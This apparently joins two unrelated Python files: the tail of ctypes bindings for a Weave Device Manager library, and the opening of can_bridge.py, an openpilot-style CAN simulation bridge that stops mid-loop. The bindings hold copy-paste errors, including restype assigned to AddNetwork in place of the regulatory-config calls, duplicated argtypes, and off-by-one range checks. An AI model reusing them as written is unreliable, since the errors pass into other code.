raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_EnableNetwork(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def DisableNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_DisableNetwork(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def TestNetworkConnectivity(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetRendezvousMode(self):
def HandleGetRendezvousModeComplete(devMgr, reqState, modeFlags):
self._weaveStack.callbackRes = modeFlags
self._weaveStack.completeEvent.set()
cbHandleGetRendezvousModeComplete = _GetRendezvousModeCompleteFunct(HandleGetRendezvousModeComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetRendezvousMode(self.devMgr, cbHandleGetRendezvousModeComplete, self._weaveStack.cbHandleError)
)
def SetRendezvousMode(self, modeFlags):
if modeFlags < 0 or modeFlags > pow(2,16):
raise ValueError("modeFlags must be an unsigned 16-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_SetRendezvousMode(self.devMgr, modeFlags, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetWirelessRegulatoryConfig(self):
def HandleComplete(devMgr, reqState, regConfigPtr):
self._weaveStack.callbackRes = regConfigPtr[0].toWirelessRegConfig()
self._weaveStack.completeEvent.set()
cbHandleComplete = _GetWirelessRegulatoryConfigCompleteFunct(HandleComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetWirelessRegulatoryConfig(self.devMgr, cbHandleComplete, self._weaveStack.cbHandleError)
)
def SetWirelessRegulatoryConfig(self, regConfig):
regConfigStruct = _WirelessRegConfigStruct.fromWirelessRegConfig(regConfig)
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_SetWirelessRegulatoryConfig(self.devMgr, regConfigStruct, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetLastNetworkProvisioningResult(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def CreateFabric(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_CreateFabric(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def LeaveFabric(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_LeaveFabric(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def GetFabricConfig(self):
def HandleGetFabricConfigComplete(devMgr, reqState, fabricConfigPtr, fabricConfigLen):
self._weaveStack.callbackRes = WeaveUtility.VoidPtrToByteArray(fabricConfigPtr, fabricConfigLen)
self._weaveStack.completeEvent.set()
cbHandleGetFabricConfigComplete = _GetFabricConfigCompleteFunct(HandleGetFabricConfigComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetFabricConfig(self.devMgr, cbHandleGetFabricConfigComplete, self._weaveStack.cbHandleError)
)
def JoinExistingFabric(self, fabricConfig):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_JoinExistingFabric(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(fabricConfig), len(fabricConfig),
self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def Ping(self):
WeaveUtility.StringToCString("test")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_Ping(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RegisterServicePairAccount(self, serviceId, accountId, serviceConfig, pairingToken, pairingInitData):
if accountId is not None and '\x00' in accountId:
raise ValueError("Unexpected NUL character in accountId")
if pairingToken is not None and isinstance(pairingToken, str):
pairingToken = WeaveUtility.StringToCString(pairingToken)
if pairingInitData is not None and isinstance(pairingInitData, str):
pairingInitData = WeaveUtility.StringToCString(pairingInitData)
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount(self.devMgr, serviceId, WeaveUtility.StringToCString(accountId),
WeaveUtility.ByteArrayToVoidPtr(serviceConfig), len(serviceConfig),
WeaveUtility.ByteArrayToVoidPtr(pairingToken), len(pairingToken),
WeaveUtility.ByteArrayToVoidPtr(pairingInitData), len(pairingInitData),
self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def UpdateService(self, serviceId, serviceConfig):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UpdateService(self.devMgr, serviceId, WeaveUtility.ByteArrayToVoidPtr(serviceConfig),
len(serviceConfig), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def UnregisterService(self, serviceId):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UnregisterService(self.devMgr, serviceId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def ArmFailSafe(self, armMode, failSafeToken):
if armMode < 0 or armMode > pow(2, 8):
raise ValueError("armMode must be an unsigned 8-bit integer")
if failSafeToken < 0 or failSafeToken > pow(2, 32):
raise ValueError("failSafeToken must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ArmFailSafe(self.devMgr, armMode, failSafeToken, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def DisarmFailSafe(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_DisarmFailSafe(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def ResetConfig(self, resetFlags):
if resetFlags < 0 or resetFlags > pow(2, 16):
raise ValueError("resetFlags must be an unsigned 16-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ResetConfig(self.devMgr, resetFlags, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def CloseEndpoints(self):
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_CloseEndpoints()
)
def SetLogFilter(self, category):
if category < 0 or category > pow(2, 8):
raise ValueError("category must be an unsigned 8-bit integer")
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetLogFilter(category)
)
def GetLogFilter(self):
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_GetLogFilter()
)
def SetBlockingCB(self, blockingCB):
self._weaveStack.blockingCB = blockingCB
def StartSystemTest(self, profileId, testId):
if profileId < 0 or profileId > pow(2, 32):
raise ValueError("profileId must be an unsigned 32-bit integer")
if testId < 0 or testId > pow(2, 32):
raise ValueError("testId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_StartSystemTest(self.devMgr, profileId, testId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def StopSystemTest(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_StopSystemTest(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
# ----- Private Members -----
def _InitLib(self):
if (self._dmLib == None):
self._dmLib = CDLL(self._weaveStack.LocateWeaveDLL())
self._dmLib.nl_Weave_DeviceManager_NewDeviceManager.argtypes = [ POINTER(c_void_p) ]
self._dmLib.nl_Weave_DeviceManager_NewDeviceManager.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_Close.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_Close.restype = None
self._dmLib.nl_Weave_DeviceManager_DriveIO.argtypes = [ c_uint32 ]
self._dmLib.nl_Weave_DeviceManager_DriveIO.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_WakeForBleIO.argtypes = [ ]
self._dmLib.nl_Weave_DeviceManager_WakeForBleIO.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleEventCB.argtypes = [ _GetBleEventFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleEventCB.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.argtypes = [ _WriteBleCharacteristicFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.argtypes = [ _SubscribeBleCharacteristicFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetBleClose.argtypes = [ _CloseBleFunct ]
self._dmLib.nl_Weave_DeviceManager_SetBleClose.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_IsConnected.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_IsConnected.restype = c_bool
self._dmLib.nl_Weave_DeviceManager_DeviceId.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_DeviceId.restype = c_uint64
self._dmLib.nl_Weave_DeviceManager_DeviceAddress.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_DeviceAddress.restype = c_char_p
self._dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _DeviceEnumerationResponseFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.argtypes = [ c_void_p ]
self._dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.restype = None
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.argtypes = [ c_void_p, c_uint64, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.argtypes = [ c_void_p, c_uint64, c_char_p, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestBle.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct, c_uint32, c_uint32, c_uint16, c_uint8, c_uint16, c_bool ]
self._dmLib.nl_Weave_DeviceManager_TestBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestResultBle.argtypes = [ c_void_p, c_void_p, c_bool ]
self._dmLib.nl_Weave_DeviceManager_TestResultBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestAbortBle.argtypes = [ c_void_p, c_void_p ]
self._dmLib.nl_Weave_DeviceManager_TestAbortBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TxTimingBle.argtypes = [ c_void_p, c_void_p, c_bool, c_bool ]
self._dmLib.nl_Weave_DeviceManager_TxTimingBle.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.argtypes = [ c_void_p, c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.argtypes = [ c_void_p, c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint32, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.argtypes = [ c_void_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ReconnectDevice.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ReconnectDevice.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.argtypes = [ c_void_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_IdentifyDevice.argtypes = [ c_void_p, _IdentifyDeviceCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_IdentifyDevice.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PairToken.argtypes = [ c_void_p, c_void_p, c_uint32, _PairTokenCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PairToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UnpairToken.argtypes = [ c_void_p, _UnpairTokenCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UnpairToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ScanNetworks.argtypes = [ c_void_p, c_int, _NetworkScanCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ScanNetworks.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetNetworks.argtypes = [ c_void_p, c_int, _GetNetworksCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetNetworks.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetCameraAuthData.argtypes = [ c_void_p, c_char_p, _GetCameraAuthDataCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetCameraAuthData.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_AddNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _AddNetworkCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_AddNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UpdateNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UpdateNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemoveNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RemoveNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_EnableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_EnableNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DisableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_DisableNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetRendezvousMode.argtypes = [ c_void_p, _GetRendezvousModeCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetRendezvousMode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetRendezvousMode.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_SetRendezvousMode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetWirelessRegulatoryConfig.argtypes = [ c_void_p, _GetWirelessRegulatoryConfigCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_AddNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetWirelessRegulatoryConfig.argtypes = [ c_void_p, POINTER(_WirelessRegConfigStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_AddNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_LeaveFabric.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_LeaveFabric.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetFabricConfig.argtypes = [ c_void_p, _GetFabricConfigCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetFabricConfig.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.argtypes = [ c_void_p, c_char_p, c_char_p ]
self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_JoinExistingFabric.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_JoinExistingFabric.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_Ping.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_Ping.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.argtypes = [ c_void_p, c_char_p ]
self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetConnectTimeout.argtypes = [ c_void_p, c_uint32 ]
self._dmLib.nl_Weave_DeviceManager_SetConnectTimeout.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetAutoReconnect.argtypes = [ c_void_p, c_bool ]
self._dmLib.nl_Weave_DeviceManager_SetAutoReconnect.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.argtypes = [ c_void_p, c_bool ]
self._dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, c_void_p, c_uint32, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UpdateService.argtypes = [ c_void_p, c_uint64, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UpdateService.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UnregisterService.argtypes = [ c_void_p, c_uint64, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UnregisterService.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ArmFailSafe.argtypes = [ c_void_p, c_uint8, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ArmFailSafe.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DisarmFailSafe.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_DisarmFailSafe.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ResetConfig.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ResetConfig.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetLogFilter.argtypes = [ ]
self._dmLib.nl_Weave_DeviceManager_GetLogFilter.restype = c_uint8
self._dmLib.nl_Weave_DeviceManager_SetLogFilter.argtypes = [ c_uint8 ]
self._dmLib.nl_Weave_DeviceManager_SetLogFilter.restype = None
self._dmLib.nl_Weave_DeviceManager_CloseEndpoints.argtypes = [ ]
self._dmLib.nl_Weave_DeviceManager_CloseEndpoints.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_StartSystemTest.argtypes = [ c_void_p, c_uint32, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_StartSystemTest.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_StopSystemTest.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_StopSystemTest.restype = c_uint32
def NetworkTypeToString(val):
if (val == NetworkType_WiFi):
return "WiFi"
if (val == NetworkType_Thread):
return "Thread"
if (val != None):
return "UNKNOWN (" + str(val)+ ")"
return None
def ParseNetworkType(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "wifi"):
return NetworkType_WiFi
if (val == "thread"):
return NetworkType_Thread
raise Exception("Invalid network type: " + str(val))
def WiFiModeToString(val):
if (val == WiFiMode_AdHoc):
return "AdHoc"
if (val == WiFiMode_Managed):
return "Managed"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiMode(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "adhoc" or val == "ad-hoc"):
return WiFiMode_AdHoc
if (val == "managed"):
return WiFiMode_Managed
raise Exception("Invalid Wifi mode: " + str(val))
def WiFiRoleToString(val):
if (val == WiFiRole_Station):
return "Station"
if (val == WiFiRole_AccessPoint):
return "AccessPoint"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiRole(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "station"):
return WiFiRole_Station
if (val == "accesspoint" or val == "access-point"):
return WiFiRole_AccessPoint
raise Exception("Invalid Wifi role: " + str(val))
def WiFiSecurityTypeToString(val):
if (val == WiFiSecurityType_None):
return "None"
if (val == WiFiSecurityType_WEP):
return "WEP"
if (val == WiFiSecurityType_WPAPersonal):
return "WPA"
if (val == WiFiSecurityType_WPA2Personal):
return "WPA2"
if (val == WiFiSecurityType_WPA2MixedPersonal):
return "WPA2Mixed"
if (val == WiFiSecurityType_WPAEnterprise):
return "WPAEnterprise"
if (val == WiFiSecurityType_WPA2Enterprise):
return "WPA2Enterprise"
if (val == WiFiSecurityType_WPA2MixedEnterprise):
return "WPA2MixedEnterprise"
if (val == WiFiSecurityType_WPA3Personal):
return "WPA3"
if (val == WiFiSecurityType_WPA3MixedPersonal):
return "WPA3Mixed"
if (val == WiFiSecurityType_WPA3Enterprise):
return "WPA3Enterprise"
if (val == WiFiSecurityType_WPA3MixedEnterprise):
return "WPA3MixedEnterprise"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseSecurityType(val):
val = val.lower()
if (val == 'none'):
return WiFiSecurityType_None
if (val == 'wep'):
return WiFiSecurityType_WEP
if (val == 'wpa' or val == 'wpapersonal' or val == 'wpa-personal'):
return WiFiSecurityType_WPAPersonal
if (val == 'wpa2' or val == 'wpa2personal' or val == 'wpa2-personal'):
return WiFiSecurityType_WPA2Personal
if (val == 'wpa3' or val == 'wpa3personal' or val == 'wpa3-personal'):
return WiFiSecurityType_WPA3Personal
if (val == 'wpa2mixed' or val == 'wpa2-mixed' or val == 'wpa2mixedpersonal' or val == 'wpa2-mixed-personal'):
return WiFiSecurityType_WPA2MixedPersonal
if (val == 'wpa3mixed' or val == 'wpa3-mixed' or val == 'wpa3mixedpersonal' or val == 'wpa3-mixed-personal'):
return WiFiSecurityType_WPA3MixedPersonal
if (val == 'wpaenterprise' or val == 'wpa-enterprise'):
return WiFiSecurityType_WPAEnterprise
if (val == 'wpa2enterprise' or val == 'wpa2-enterprise'):
return WiFiSecurityType_WPA2Enterprise
if (val == 'wpa3enterprise' or val == 'wpa3-enterprise'):
return WiFiSecurityType_WPA3Enterprise
if (val == 'wpa2mixedenterprise' or val == 'wpa2-mixed-enterprise'):
return WiFiSecurityType_WPA2MixedEnterprise
if (val == 'wpa3mixedenterprise' or val == 'wpa3-mixed-enterprise'):
return WiFiSecurityType_WPA3MixedEnterprise
raise Exception("Invalid Wifi security type: " + str(val))
def DeviceFeatureToString(val):
if (val == DeviceFeature_HomeAlarmLinkCapable):
return "HomeAlarmLinkCapable"
if (val == DeviceFeature_LinePowered):
return "LinePowered"
return "0x%08X" % (val)
def OperatingLocationToString(val):
if val == 1:
return 'unknown'
if val == 2:
return 'indoors'
if val == 3:
return 'outdoors'
raise Exception("Invalid operating location: " + str(val))
def ParseOperatingLocation(val):
val = val.lower()
if val == 'unknown':
return 1
if val == 'indoors':
return 2
if val == 'outdoors':
return 3
raise Exception("Invalid operating location: " + str(val))
|
can_bridge.py
|
#!/usr/bin/env python3
#pylint: skip-file
import os
import time
#import math
#import atexit
#import numpy as np
#import threading
#import random
import cereal.messaging as messaging
#import argparse
from common.params import Params
from common.realtime import Ratekeeper
from selfdrive.golden.can import can_function, sendcan_function
from selfdrive.car.honda.values import CruiseButtons
#import subprocess
import sys
import signal
import threading
from queue import Queue
from selfdrive.golden.keyboard_ctrl import keyboard_poll_thread, keyboard_shutdown
params = Params()
def shutdown():
global params
global pm
print('shutdown !')
keyboard_shutdown()
params.delete("CalibrationParams")
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': False,
'pandaType': "uno",
'controlsAllowed': True,
'safetyModel': "hondaNidec"
}
for seq in range(10):
pm.send('pandaState', dat)
time.sleep(0.1)
print ("exiting")
sys.exit(0)
def main():
global params
global pm
params.delete("Offroad_ConnectivityNeeded")
params.delete("CalibrationParams")
params.put("CalibrationParams", '{"calib_radians": [0,0,0], "valid_blocks": 20}')
os.system('rm /tmp/op_git_updated')
os.system('touch /tmp/op_simulation')
start_loggerd = False
if len(sys.argv) > 1:
start_loggerd = (sys.argv[1] == '1')
print ('start_loggerd=', start_loggerd)
if start_loggerd:
os.system('cd /data/openpilot/; ./selfdrive/loggerd/loggerd &')
os.system('echo 1 > /tmp/force_calibration')
# make volume 0
os.system('service call audio 3 i32 3 i32 0 i32 1')
q = Queue()
t = threading.Thread(target=keyboard_poll_thread, args=[q])
t.start()
pm = messaging.PubMaster(['can', 'pandaState'])
# can loop
sendcan = messaging.sub_sock('sendcan')
rk = Ratekeeper(100, print_delay_threshold=None)
steer_angle = 0.0
speed = 50.0 / 3.6
cruise_button = 0
btn_list = []
btn_hold_times = 2
frames = 0
while 1:
# check keyboard input
if not q.empty():
